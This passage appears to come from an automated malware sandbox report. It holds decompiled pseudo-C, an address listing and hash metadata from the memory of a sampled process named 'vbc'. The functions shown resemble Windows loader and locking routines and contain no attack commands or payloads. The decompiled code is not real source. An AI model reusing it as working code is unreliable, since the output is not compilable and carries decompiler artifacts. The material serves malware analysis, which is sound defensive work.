													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1595c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E015EF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E015EF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01637016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L015D2400(_t267 + 0x20);
															}
															L015D2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E015E2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E015D2280(_t134, 0x16a8608);
									__eflags =  *0x16a6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E015CFFB0(_t198, _t241, 0x16a8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x16a6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x16a8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E015E6B90(_t210,  &_v64);
										_t262 =  *0x16a8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E015EE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E015F97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E015F006A(0x16a8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x16a8608);
												E015FB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x16a6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x16a6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E015CFFB0(_t198, _t240, 0x16a8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E015F00C2(0x16a8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                  0x015e20a0
                                                  0x015e20a8
                                                  0x015e20ad
                                                  0x015e20b3
                                                  0x015e20b8
                                                  0x015e20c2
                                                  0x015e20c7
                                                  0x015e20cb
                                                  0x015e20d2
                                                  0x015e2263
                                                  0x015e2266
                                                  0x01625836
                                                  0x01625836
                                                  0x00000000
                                                  0x015e226c
                                                  0x015e226c
                                                  0x015e2270
                                                  0x015e2274
                                                  0x015e20e2
                                                  0x015e20e2
                                                  0x015e20e6
                                                  0x015e20ee
                                                  0x016257dc
                                                  0x016257de
                                                  0x016257ec
                                                  0x016257ec
                                                  0x016257f1
                                                  0x016257f3
                                                  0x016257f8
                                                  0x00000000
                                                  0x016257f8
                                                  0x016257e0
                                                  0x016257e4
                                                  0x016257ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x016257ea
                                                  0x015e20f4
                                                  0x015e20f4
                                                  0x015e20f8
                                                  0x015e20f8
                                                  0x015e20fc
                                                  0x015e2100
                                                  0x015e2106
                                                  0x015e2201
                                                  0x015e2206
                                                  0x015e220b
                                                  0x015e220e
                                                  0x015e22a9
                                                  0x015e22ac
                                                  0x00000000
                                                  0x00000000
                                                  0x015e22b2
                                                  0x015e22b5
                                                  0x01625801
                                                  0x01625806
                                                  0x00000000
                                                  0x00000000
                                                  0x01625810
                                                  0x01625815
                                                  0x01625818
                                                  0x00000000
                                                  0x00000000
                                                  0x0162581e
                                                  0x015e22bb
                                                  0x015e22bb
                                                  0x015e2218
                                                  0x015e2218
                                                  0x015e221c
                                                  0x015e2220
                                                  0x015e2222
                                                  0x015e22c2
                                                  0x015e22c4
                                                  0x015e22dc
                                                  0x015e22dc
                                                  0x015e22e1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015e22e7
                                                  0x015e22c8
                                                  0x015e22cd
                                                  0x015e22d3
                                                  0x015e22d6
                                                  0x01625823
                                                  0x01625825
                                                  0x01625827
                                                  0x00000000
                                                  0x00000000
                                                  0x0162582d
                                                  0x00000000
                                                  0x0162582d
                                                  0x00000000
                                                  0x015e2228
                                                  0x015e2228
                                                  0x00000000
                                                  0x015e2228
                                                  0x015e2222
                                                  0x015e2214
                                                  0x015e2214
                                                  0x00000000
                                                  0x015e2114
                                                  0x015e2114
                                                  0x015e2114
                                                  0x015e211a
                                                  0x015e211c
                                                  0x015e2348
                                                  0x015e234d
                                                  0x01625840
                                                  0x01625845
                                                  0x01625848
                                                  0x0162584e
                                                  0x0162584e
                                                  0x01625848
                                                  0x015e2353
                                                  0x015e2355
                                                  0x015e2388
                                                  0x015e2388
                                                  0x015e2368
                                                  0x015e236a
                                                  0x015e236c
                                                  0x015e238f
                                                  0x00000000
                                                  0x015e236e
                                                  0x015e236e
                                                  0x015e218e
                                                  0x015e218e
                                                  0x015e2191
                                                  0x015e2195
                                                  0x01625a03
                                                  0x01625a06
                                                  0x01625a0c
                                                  0x01625a0f
                                                  0x01625a11
                                                  0x01625a13
                                                  0x01625a13
                                                  0x01625a19
                                                  0x01625a1f
                                                  0x00000000
                                                  0x015e219b
                                                  0x015e219b
                                                  0x015e21a0
                                                  0x015e2282
                                                  0x015e2284
                                                  0x015e2284
                                                  0x015e2284
                                                  0x015e2284
                                                  0x015e21a6
                                                  0x015e21a9
                                                  0x015e21ac
                                                  0x015e21ae
                                                  0x015e21b3
                                                  0x015e228b
                                                  0x015e2290
                                                  0x015e2379
                                                  0x015e2296
                                                  0x015e2298
                                                  0x015e2298
                                                  0x015e2290
                                                  0x015e21b9
                                                  0x015e21be
                                                  0x015e22a2
                                                  0x015e22a2
                                                  0x015e21c4
                                                  0x015e21c8
                                                  0x015e21cc
                                                  0x015e21d0
                                                  0x015e21d4
                                                  0x015e21de
                                                  0x015e21e3
                                                  0x01625a29
                                                  0x01625a2c
                                                  0x00000000
                                                  0x00000000
                                                  0x01625a3b
                                                  0x00000000
                                                  0x015e21e9
                                                  0x015e21e9
                                                  0x015e21e9
                                                  0x015e21ee
                                                  0x015e21f1
                                                  0x01625a45
                                                  0x01625a4b
                                                  0x01625a52
                                                  0x01625a58
                                                  0x01625a5d
                                                  0x01625a5f
                                                  0x01625a71
                                                  0x01625a61
                                                  0x01625a6a
                                                  0x01625a6a
                                                  0x01625a76
                                                  0x01625a79
                                                  0x01625a7f
                                                  0x01625a83
                                                  0x01625a85
                                                  0x01625a87
                                                  0x01625a87
                                                  0x01625a8c
                                                  0x01625a91
                                                  0x01625a97
                                                  0x01625a9f
                                                  0x01625aa0
                                                  0x01625aa1
                                                  0x01625aa6
                                                  0x01625aab
                                                  0x01625ab1
                                                  0x01625ab3
                                                  0x01625ab9
                                                  0x01625aca
                                                  0x01625ad4
                                                  0x01625ad4
                                                  0x01625ade
                                                  0x01625ade
                                                  0x01625aab
                                                  0x01625a79
                                                  0x01625a52
                                                  0x015e21f7
                                                  0x015e21f9
                                                  0x015e21fe
                                                  0x015e21fe
                                                  0x015e21e3
                                                  0x015e2195
                                                  0x015e236c
                                                  0x015e2122
                                                  0x015e2122
                                                  0x015e2124
                                                  0x015e2231
                                                  0x015e2236
                                                  0x015e2236
                                                  0x015e2238
                                                  0x015e2238
                                                  0x015e2240
                                                  0x015e2242
                                                  0x015e2244
                                                  0x016259fc
                                                  0x015e218c
                                                  0x015e218c
                                                  0x00000000
                                                  0x015e218c
                                                  0x015e224a
                                                  0x015e224f
                                                  0x015e2256
                                                  0x015e2304
                                                  0x015e2309
                                                  0x015e230f
                                                  0x015e231e
                                                  0x015e231e
                                                  0x015e231e
                                                  0x015e2320
                                                  0x015e2325
                                                  0x015e232a
                                                  0x015e232c
                                                  0x015e233e
                                                  0x015e233e
                                                  0x00000000
                                                  0x015e232c
                                                  0x015e2311
                                                  0x015e2317
                                                  0x015e231a
                                                  0x015e231c
                                                  0x015e2380
                                                  0x015e2380
                                                  0x015e2380
                                                  0x015e2384
                                                  0x00000000
                                                  0x00000000
                                                  0x015e2386
                                                  0x00000000
                                                  0x015e231c
                                                  0x015e225c
                                                  0x015e225c
                                                  0x00000000
                                                  0x015e225c
                                                  0x015e212a
                                                  0x015e2134
                                                  0x015e2138
                                                  0x015e213d
                                                  0x01625858
                                                  0x01625863
                                                  0x01625863
                                                  0x01625867
                                                  0x0162586a
                                                  0x00000000
                                                  0x00000000
                                                  0x0162586c
                                                  0x0162586c
                                                  0x01625871
                                                  0x01625875
                                                  0x01625877
                                                  0x01625997
                                                  0x0162599c
                                                  0x016259a1
                                                  0x016259a7
                                                  0x016259a7
                                                  0x00000000
                                                  0x016259a7
                                                  0x0162587d
                                                  0x00000000
                                                  0x0162588b
                                                  0x0162588b
                                                  0x01625890
                                                  0x01625892
                                                  0x01625894
                                                  0x01625899
                                                  0x0162589b
                                                  0x016258a0
                                                  0x016258a0
                                                  0x016258aa
                                                  0x016258b2
                                                  0x016258b6
                                                  0x016258be
                                                  0x016258c6
                                                  0x016258c9
                                                  0x0162590d
                                                  0x01625917
                                                  0x0162591a
                                                  0x0162591c
                                                  0x01625920
                                                  0x01625928
                                                  0x0162592a
                                                  0x0162592c
                                                  0x0162592e
                                                  0x0162592e
                                                  0x016258cb
                                                  0x016258cd
                                                  0x016258d8
                                                  0x016258e0
                                                  0x016258f4
                                                  0x016258fe
                                                  0x016258fe
                                                  0x0162593a
                                                  0x0162593e
                                                  0x01625940
                                                  0x01625942
                                                  0x00000000
                                                  0x01625944
                                                  0x01625944
                                                  0x01625949
                                                  0x0162594e
                                                  0x0162594e
                                                  0x01625953
                                                  0x0162595b
                                                  0x01625976
                                                  0x01625976
                                                  0x0162597a
                                                  0x0162597f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01625981
                                                  0x01625981
                                                  0x01625981
                                                  0x01625983
                                                  0x01625988
                                                  0x0162598d
                                                  0x01625991
                                                  0x01625991
                                                  0x00000000
                                                  0x0162595d
                                                  0x0162595d
                                                  0x01625963
                                                  0x01625965
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01625967
                                                  0x01625967
                                                  0x0162596b
                                                  0x0162596d
                                                  0x00000000
                                                  0x00000000
                                                  0x0162596f
                                                  0x01625971
                                                  0x01625971
                                                  0x01625974
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01625974
                                                  0x00000000
                                                  0x01625967
                                                  0x0162595b
                                                  0x01625942
                                                  0x01625863
                                                  0x015e2143
                                                  0x015e2143
                                                  0x015e2149
                                                  0x015e214f
                                                  0x015e22f1
                                                  0x015e22f6
                                                  0x00000000
                                                  0x015e2173
                                                  0x015e2173
                                                  0x015e217d
                                                  0x015e2181
                                                  0x015e2186
                                                  0x016259ae
                                                  0x016259b2
                                                  0x016259b5
                                                  0x016259b7
                                                  0x016259ba
                                                  0x016259cd
                                                  0x016259d1
                                                  0x016259d5
                                                  0x016259d9
                                                  0x016259db
                                                  0x00000000
                                                  0x00000000
                                                  0x016259dd
                                                  0x016259dd
                                                  0x016259e1
                                                  0x016259e4
                                                  0x016259e7
                                                  0x016259ee
                                                  0x016259ee
                                                  0x016259f3
                                                  0x016259f3
                                                  0x00000000
                                                  0x015e2186
                                                  0x015e214f
                                                  0x015e2106
                                                  0x015e2266
                                                  0x015e20d8
                                                  0x015e20da
                                                  0x015e20e0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e0d00721dc254b89da04a2671fcea5912859b07b037c67933e1201883993727
                                                  • Instruction ID: 73a09160ca5d07a4083efaf3ffacceb6393151b136149f10f730acc27673fab2
                                                  • Opcode Fuzzy Hash: 3e0d00721dc254b89da04a2671fcea5912859b07b037c67933e1201883993727
                                                  • Instruction Fuzzy Hash: 0DF1D231E087529FE72ACB2CC84476A7BE9BB85314F08891DE9968F385D775D841CF82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015CD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 87%
                                                  			E015CD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x16ad360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E015C6600(0x16a52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x16a7b9c; // 0x0
							_t281 = L015D4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E015FF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x16a7b90; // 0x77290000
								if(_t384 == 0) {
									_t353 =  *0x16a7b8c; // 0x1152a88
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E015D2280(_t200, 0x16a84d8);
									_t277 =  *0x16a85f4; // 0x1152f78
									_t351 =  *0x16a85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1152f10
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E015CFFB0(_t287, _t353, 0x16a84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0160CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E015C6600(0x16a52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E015C7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x16ab239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0163E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x16a8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x16ab1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x16ab218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E015D2280(_t250, 0x16a84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L015F3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E015CFFB0(_t293, _t353, 0x16a84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E015F37F5(_t353, 0);
																}
																E015F0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E015E9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E015E02D6(_t174);
																}
																L015D77F0( *0x16a7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E015EC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L015CEC7F(_t353);
										L015E19B8(_t287, 0, _t353, 0);
										_t200 = E015BF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x16ab2f8 |  *0x16ab2fc) == 0 || ( *0x16ab2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E015FB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x16ab2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01666B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01666AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E015CE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L015CEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E015F9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E015CE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
